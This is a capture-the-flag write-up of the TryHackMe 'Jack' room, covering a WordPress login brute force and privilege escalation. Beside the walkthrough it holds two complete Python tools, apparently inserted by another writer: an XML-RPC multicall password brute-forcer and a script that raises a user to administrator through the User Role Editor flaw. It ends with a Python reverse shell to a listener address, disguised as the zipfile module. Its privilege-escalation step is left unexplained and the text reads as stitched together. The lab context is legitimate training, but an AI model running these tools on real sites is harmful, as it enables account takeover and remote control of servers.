A challenging room from tryhackme

Jack Writeup by kyryloren — Tryhackme

kyryloren
5 min read · Apr 19, 2020

PLEASE NOTE THERE ARE A LOT OF ISSUES WITH THIS WRITEUP. EVEN THOUGH I GOT ROOT FLAG AT THE END, IT WASN’T THE INTENDED WAY AND I MISSED A LOT OF IMPORTANT DETAILS. FOR A MORE DETAILED WRITEUP PLEASE WATCH OPTIONAL’S: https://youtu.be/xV42XUetrS4

I’m not one for writing writeups but here goes nothing. I first saw this room a while back when I was still on Kali. Now I’ve migrated to BlackArch and I can confidently say it’s a whole different world. This writeup is for the “Jack” room. I found the room pretty difficult, especially since there were no writeups for it and not a lot of people had done it.

If you get stuck in this room during enumeration or privilege escalation, consider trying harder. Trust me, it’s satisfying and worth it at the end.

Pre-Setup

This is optional but, I find it useful. Go ahead and add jack.thm to the /etc/hosts file.

/etc/hosts document

Enumeration

Let’s start as we normally would, with the ol’ nmap scan. If you’re confused here, please leave before you’re too far gone. I output all my nmap scans into a directory called “nmap” (note that -sS is a raw SYN scan and needs root, so run it with sudo).

nmap -T4 -sS -sC -sV -oA nmap/initial jack.thm

The scan shows us a few useful things. There is an open SSH port. I tried to SSH in but, obviously, we don’t have a password. Let’s check out the website instead. I immediately see a /wp-admin/ directory, which tells us this is a WordPress site. Knowing that, I can start wpscan right away and enumerate users and plugins at the same time.

wpscan -e u,ap --url http://jack.thm

OK, we get a few great results. xmlrpc.php is enabled, which means wpscan can try logins through the XML-RPC interface (batching them with system.multicall) instead of hitting wp-login.php one request at a time. We also get a few usernames, which is looking really good for us. I put these usernames in a users.txt for later use.

Because no plugins were found, there is nothing plugin-specific to exploit. I researched exploits for this WordPress version and didn’t find anything either. I asked people who completed this box and they said the way to go is to brute force. Let’s use that users.txt file we made earlier.

wpscan --url http://jack.thm/ -t 3 -P rockyou.txt -U users.txt
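As an added example (my own code, not the author’s and not wpscan’s), here is what the xmlrpc.php finding actually buys an attacker: a single system.multicall request that tests a whole batch of passwords through wp.getUsersBlogs, which is the trick wpscan uses when the interface is available. The host is the one from the writeup, the username and wordlist are placeholders, and the response is constructed by hand to show one failed and one successful call.

```python
#!/usr/bin/env python3
"""WordPress XML-RPC system.multicall password check (added example).

Assumptions: the target is http://jack.thm (from the writeup), the username
and wordlist are placeholders, and SAMPLE_RESPONSE is constructed by hand.
"""
import sys
import urllib.request
import xmlrpc.client

TARGET = "http://jack.thm"   # assumption: host the writeup added to /etc/hosts


def build_multicall(user, passwords):
    """One POST body that authenticates `user` against every password in the batch.

    wp.getUsersBlogs only needs (username, password): a failed call comes back
    as a fault struct, a good one as the list of blogs the user can see.
    """
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def parse_multicall(passwords, body):
    """Return the passwords whose call did not come back as a fault."""
    (results,), _ = xmlrpc.client.loads(body)
    hits = []
    for pw, result in zip(passwords, results):
        # A per-call failure is a struct with faultCode/faultString; a success is
        # a one-element array wrapping the method's return value.
        if isinstance(result, dict) and "faultCode" in result:
            continue
        hits.append(pw)
    return hits


def try_batch(user, passwords, target=TARGET):
    """POST one batch to xmlrpc.php and return the passwords that worked."""
    req = urllib.request.Request(
        target + "/xmlrpc.php",
        data=build_multicall(user, passwords),
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return parse_multicall(passwords, resp.read())


# Constructed response (not captured from a real host): first call failed,
# second succeeded.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
  <value><struct>
    <member><name>faultCode</name><value><int>403</int></value></member>
    <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
  </struct></value>
  <value><array><data>
    <value><array><data>
      <value><struct>
        <member><name>isAdmin</name><value><boolean>0</boolean></value></member>
        <member><name>blogid</name><value><string>1</string></value></member>
        <member><name>blogName</name><value><string>Example Blog</string></value></member>
      </struct></value>
    </data></array></value>
  </data></array></value>
</data></array></value></param></params></methodResponse>"""


if __name__ == "__main__":
    user = sys.argv[1] if len(sys.argv) > 1 else "jack"          # assumption: placeholder
    wordlist = sys.argv[2] if len(sys.argv) > 2 else "passwords.txt"  # assumption: placeholder
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        words = [w.rstrip("\n") for w in fh if w.strip()]
    for i in range(0, len(words), 50):
        for pw in try_batch(user, words[i:i + 50]):
            print(f"[+] {user}:{pw}")
```

One caveat before relying on the batching: since WordPress 4.4 a failed login inside a multicall makes the remaining calls in that batch fail without being checked, so on a patched target each request collapses to one real guess and the per-call parsing above simply finds nothing past the first fault. The finding is still worth noting because XML-RPC logins bypass some wp-login.php rate limiting plugins, but the speed-up only exists on old installs.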

I let this run for a bit and after an hour, I got bored. This was obviously the wrong wordlist. I followed up on the Jack TryHackMe forums and someone said that the wordlist is much shorter, not the standard rockyou. Good thing I had an extra Kali VM lying around because, without it, I would have been screwed. I copied over the shorter wordlist and we got a login!

YES! That was the best feeling. Don’t worry, I also got stuck at this stage. Let’s login with the credentials we found.

Exploitation

At first, I thought there would be a way to upload a reverse shell through the posts, but there are a number of reasons that doesn’t work. I took a look at the hint for the user flag and it said “ure_other_roles” at the end.

A quick DuckDuckGo search told me that this is a parameter of the User Role Editor plugin, a WordPress plugin for managing user privileges. Bingo! I found a Metasploit exploit for this plugin on exploit-db at https://exploit-db.com/exploits/44595. Upon running this exploit, it didn’t work. I even tried to edit the source, but nothing. Luckily, I found a useful article: https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/.

Open up Burp and point the browser at the proxy. Change anything (I changed the bio) in the Profile section of the WordPress dashboard and click “Update Profile”. Burp intercepts the POST to profile.php.

Append this to the end of the request body, as mentioned in the article, and forward all the requests.

&ure_other_roles=administrator

Looks like we got admin! I went ahead and changed the current user’s default role to “Administrator” just so that we don’t lose this.
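The Burp step above is easy to script, so here is an added example (my own code, not the writeup’s and not the plugin’s) that logs in as the brute-forced user, fetches the profile form, and replays it with ure_other_roles=administrator appended, exactly the POST the article has you edit by hand. TARGET, USERNAME and PASSWORD are placeholders, and the sample form is a constructed cut-down copy of what profile.php renders.

```python
#!/usr/bin/env python3
"""Replay the profile update with ure_other_roles added (added example).

Assumptions: TARGET is the host from the writeup, USERNAME/PASSWORD are
placeholders for the brute-forced account, SAMPLE_FORM is a constructed
cut-down profile form, and the "plugins.php" check is a heuristic for admin.
"""
import http.cookiejar
import urllib.parse
import urllib.request
from html.parser import HTMLParser

TARGET = "http://jack.thm"   # assumption: host from the writeup
USERNAME = "wendy"           # assumption: replace with the brute-forced account
PASSWORD = "changeme"        # assumption: replace with the brute-forced password


class FormInputs(HTMLParser):
    """Collect name/value pairs of the <input> tags the browser would submit."""

    SKIP_TYPES = {"submit", "button", "checkbox", "radio", "password"}

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = dict(attrs)
        name = attr.get("name")
        # Unchecked boxes are not sent by a browser and an empty password field
        # means "unchanged", so skipping both mirrors what Burp intercepted.
        if not name or attr.get("type", "text") in self.SKIP_TYPES:
            return
        self.fields[name] = attr.get("value") or ""


def parse_profile_form(html):
    parser = FormInputs()
    parser.feed(html)
    return parser.fields


def build_escalation_body(fields, role="administrator"):
    """The same POST the dashboard sends, plus the parameter from the writeup."""
    body = dict(fields)
    body["action"] = "update"        # profile.php expects this to save changes
    body["ure_other_roles"] = role   # read by the vulnerable User Role Editor
    return urllib.parse.urlencode(body).encode()


def escalate(target=TARGET, user=USERNAME, password=PASSWORD):
    """Log in, replay the profile form with the extra role, report admin."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(target + "/wp-login.php")   # sets wordpress_test_cookie
    login = urllib.parse.urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": target + "/wp-admin/", "testcookie": "1",
    }).encode()
    opener.open(target + "/wp-login.php", login)
    html = opener.open(target + "/wp-admin/profile.php").read().decode(errors="replace")
    fields = parse_profile_form(html)
    if "_wpnonce" not in fields or "user_id" not in fields:
        raise SystemExit("profile form not found: did the login work?")
    opener.open(target + "/wp-admin/profile.php", build_escalation_body(fields))
    # Assumption: the admin menu only links plugins.php for administrators.
    dashboard = opener.open(target + "/wp-admin/").read().decode(errors="replace")
    return "plugins.php" in dashboard


# Constructed cut-down profile form (not captured from the box).
SAMPLE_FORM = """<form id="your-profile" action="profile.php" method="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/profile.php" />
<input type="hidden" name="from" value="profile" />
<input type="hidden" name="checkuser_id" value="3" />
<input type="checkbox" name="rich_editing" value="false" />
<input type="text" name="nickname" id="nickname" value="wendy" />
<input type="email" name="email" id="email" value="wendy@jack.thm" />
<input type="password" name="pass1" id="pass1" value="" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user_id" id="user_id" value="3" />
<input type="submit" name="submit" id="submit" class="button" value="Update Profile" />
</form>"""


if __name__ == "__main__":
    print("administrator" if escalate() else "role unchanged")
```

Replaying the whole form matters: profile.php validates the nonce and refuses to save without a nickname and e-mail, so a minimal POST with only ure_other_roles fails before the plugin ever reads it. The trick only works on the User Role Editor versions the exploit-db entry covers; on a fixed version the extra parameter is ignored and the Users menu stays hidden.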

With this, we can now fire up Metasploit and use exploit/unix/webapp/wp_admin_shell_upload, which uses the admin credentials to upload a malicious plugin. Set all the required options (RHOSTS, USERNAME, PASSWORD, LHOST) and run it.

One weird thing I found was that the session starts in a directory that no longer exists (the module uploads a temporary plugin folder and cleans it up afterwards). First, do ‘cd ..’. Then type “shell” to open up a system shell. Let’s use python to get an upgraded bash shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Let’s go into the user’s home directory under /home and grab our first flag!

Privilege Escalation

So right now we have a very low privilege user. The reminder file in the directory of the user flag indicates there should be something in backups. Let’s cd into /var/backups.

Looks like there is an id_rsa key. Remember that open SSH port? Copy the key to the attacking machine, restrict its permissions to the owner only (ssh refuses a key that other users can read), and use it to log in to the jack account over SSH.

With this account we can write to many more directories. Let’s upload linpeas to see more. The reverse shell payload I ended up writing out with printf is below; LHOST and LPORT are placeholders for your listener’s address and port (LPORT stays an unquoted integer), and the stub ZipFile class and ZIP_DEFLATED constant are there so that whatever imports this file in place of the real module still finds those names after the shell spawns.

printf "import os\nimport pty\nimport socket\nZIP_DEFLATED=0\nclass ZipFile:\n    def close(*args):return\n    def write(*args): return\n    def __init__(self, *args):return\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('LHOST',LPORT))\nos.dup2(s.fileno(),0)\nos.dup2(s.fileno(),1)\nos.dup2(s.fileno(),2)\nos.putenv('HISTFILE','/dev/null')\npty.spawn('/bin/bash')\ns.close()" > text.py

That’s it! Wasn’t that hard, right? If you found any other ways of exploiting this system or you think I did something wrong, feel free to ask me! I’m @kyryloren on tryhackme.

Look out for more writeups as I improve my haxor skillz.
